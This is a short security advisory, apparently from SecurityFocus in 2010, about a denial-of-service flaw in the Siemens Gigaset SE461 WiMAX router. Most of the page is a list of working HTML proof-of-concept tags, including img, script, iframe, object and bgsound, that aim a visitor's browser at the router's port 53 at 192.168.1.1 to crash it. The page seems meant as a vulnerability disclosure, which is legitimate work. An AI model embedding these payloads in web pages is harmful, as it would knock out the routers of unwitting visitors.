Siemens Gigaset SE461 WiMAX router Request Denial of Service Vulnerability

Attackers can exploit this issue using a browser.

The following proofs of concept are available:

<img src="http://192.168.1.1:53" />
<img src="http://192.168.1.1:53/p.png" />
<a href="http://192.168.1.1:53">click me</a>
<link href="192.168.1.1:53" rel="stylesheet" type="text/css" />
<link href="192.168.1.1:53/p.css" rel="stylesheet" type="text/css" />
<div style="background-image:url(http://192.168.1.1:53)"></div>
<div style="background-image:url(http://192.168.1.1:53/p.png)"</div>
<object data="http://192.168.1.1:53" type="image/gif" ></object>
<object data="http://192.168.1.1:53/p.gif" type="image/gif" ></object>
<script src="http://192.168.1.1:53"></script>
<script src="http://192.168.1.1:53/p.js"></script>
<iframe src="http://192.168.1.1:53"></iframe>
<iframe src="http://192.168.1.1:53/p.html"></iframe>
<bgsound src="http://192.168.1.1:53"></bgsound>
<bgsound src="http://192.168.1.1:53/p.wav"></bgsound>
<head><base href="http://192.168.1.1:53/"></head>
<base href="http://192.168.1.1:53/" /></head>


An HTML exploit file is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus